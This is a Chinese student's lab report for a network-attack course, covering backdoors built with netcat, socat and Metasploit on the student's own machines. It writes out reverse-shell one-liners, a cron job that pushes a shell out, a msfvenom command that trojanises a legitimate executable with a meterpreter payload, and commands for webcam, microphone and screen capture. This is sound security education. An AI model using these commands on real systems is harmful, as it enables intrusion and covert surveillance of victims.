• 2017-2018-2 《网络对抗技术》 20155322 第五周 Exp2 后门原理与实践


    2017-2018-2 《网络对抗技术》 20155322 第五周 Exp2 后门原理与实践


    [博客目录]


    1-实践目标

    1.1-实践介绍

    学习内容:

    • 使用nc实现win,mac,Linux间的后门连接
    • meterpreter的应用
    • MSF POST 模块的应用

    学习目标:
    建立一个后门连接是如此的简单,功能又如此强大。通过亲手实践并了解这一事实,从而提高自己的安全意识 。

    返回目录

    1.2-实践内容

    • 使用netcat获取主机操作Shell,cron启动 (0.5分)
    • 使用socat获取主机操作Shell, 任务计划启动 (0.5分)
    • 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
    • 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
    • 可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

    返回目录

    1.3-实践要求

    • 基础问题回答

      • 例举你能想到的一个后门进入到你系统中的可能方式?
      • 例举你知道的后门如何启动起来(win及linux)的方式?
      • Meterpreter有哪些给你映像深刻的功能?
      • 如何发现自己有系统有没有被安装后门?
    • 实验总结与体会

    • 实践过程记录

    • 报告评分 1.5分

      • 报告整体观感 0.5分
      • 报告格式范围,版面整洁 加0.5。
      • 报告排版混乱,加0分。
    • 文字表述 1分

      • 报告文字内容非常全面,表述清晰准确 加1分。
      • 报告逻辑清楚,比较简要地介绍了自己的操作目标与过程 加0.5分。
      • 报告逻辑混乱表述不清或文字有明显抄袭可能 加0分

    返回目录

    2-实践过程

    2.1 使用nc实现mac,Linux间的后门连接

    • Mac获取Linux Shell
      首先主控端/服务端MAC运行指令如下,8888是nc监听的端口号,然后运行:bash -i >& /dev/tcp/192.168.3.59/8888 0>&1,失败,再试nc 192.168.3.59 8888 -e /bin/sh

      发现并没有什么用……失败
    • Linux获取Mac Shell
      首先获取Linux的ip:ifconfig,然后监听nc -l -p 8888,Mac方面进行连接:bash -i >& /dev/tcp/192.168.20.154/8888 0>&1

      这时我们发现Linux终端上显示了MAC的命令提示符:

    返回目录

    2.2 使用netcat获取主机操作Shell

    使用netcat获取主机操作Shell,cron启动

    • 在Windows系统下监听5217端口ncat.exe -l -p 5217
    • 在Kali中用crontab -e编辑一条定时任务:
      使用vim,直接在最下面一行加入25 * * * * /bin/netcat 192.168.196.136 5322 -e /bin/sh

    返回目录

    2.3 3使用socat获取主机操作Shell

    使用socat获取主机操作Shell, 任务计划启动

    • 首先在Windows系统中找到“计划任务”

    • 创建基本任务>一次>启动程序socat.exe>参数输入:tcp-listen:5322 exec:cmd.exe,pty,stderr (两个参数之间用空格或者;)
    • 启动任务,并在Kali中输入socat - tcp:windowsIP:端口


      然后就会发现获得了win的操作shell

    返回目录

    2.4 meterpreter的应用

    我的电脑系统是Mac,老师教程给的是Windows+Linux的例子,因为15年的渣渣Air开两个虚拟机会凉凉(别问我为什么……),争分夺秒,度秒如年……

    1. 首先选择一个windows可执行文件,执行如下指令:
      msfvenom -p windows/meterpreter/reverse_tcp -x ./KiTTYPortable.exe -e x86/shikata_ga_nai -i 5 -b ‘x00’ LHOST=192.168.20.136 LPORT=443 -f exe > KiTTy_backdoor.exe
      生成的文件复制到windows中。

    2. 打开msfconsole:输入以下指令:

        use exploit/multi/handler
        set payload windows/meterpreter/reverse_tcp
        set LHOST 192.168.196.140
        set LPORT 4444 //这里不知道为啥变成4444了
        show options
        exploit
    
    1. 在Windows平台上运行可执行文件,Linux平台的监听进程将获得Win主机的主动连接,并得到远程控制shell:

    返回目录

    2.5 Meterpreter常用功能

    使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    1. 获取Windows命令行界面,以方便执行Windows内置功能指令,exit退出。
    2. 获取ruby交互界面,exit退出
    3. 进程和和迁移

      这里出现timeout,超时了,只能再运行一下后门了。
      ……
    4. 接下来我们试试提音频:record_mic
    5. 接下来是看看摄像头:webcam_snap
    6. 看看截图?screenshot
    7. 还有其他的很多操作,可以通过help指令来了解

    返回目录

    2.6 基础问题回答

    • 例举你能想到的一个后门进入到你系统中的可能方式?
      答:可能通过网站挂马的方式,让用户加载网页的时候下载到用户的电脑上。
    • 例举你知道的后门如何启动起来(win及linux)的方式?
      答:Linux发送后门到Windows上,Windows可以只要运行就能启动后门
    • Meterpreter有哪些给你映像深刻的功能?
      答:截屏,拍照,录音……
    • 如何发现自己有系统有没有被安装后门?
      答:这个看经验吧,主要是得注意上网,不要乱点链接,不要插陌生U盘等等……

    返回目录

    3-实验感想&参考资料

    实验感想:非常有趣的实验,基本上是满足了我对于黑客的幻想(获取远程控制shell和摄像头O(∩_∩)O),总之感觉很棒,希望能在将来学到更多东西!

    返回目录

  • 相关阅读:
    软件工程第二次作业
    软件工程第一次作业
    软件工程最后一次作业
    软件工程第四次作业
    软件工程第三次作业
    软件工程第二次作业
    软件工程第一次作业
    《算法笔记》2.2小节——C/C++快速入门->顺序结构
    大数阶乘
    printf("%f ",5)的输出结果为什么是0.000000
  • 原文地址:https://www.cnblogs.com/blackay03/p/8661112.html
Copyright © 2020-2023  润新知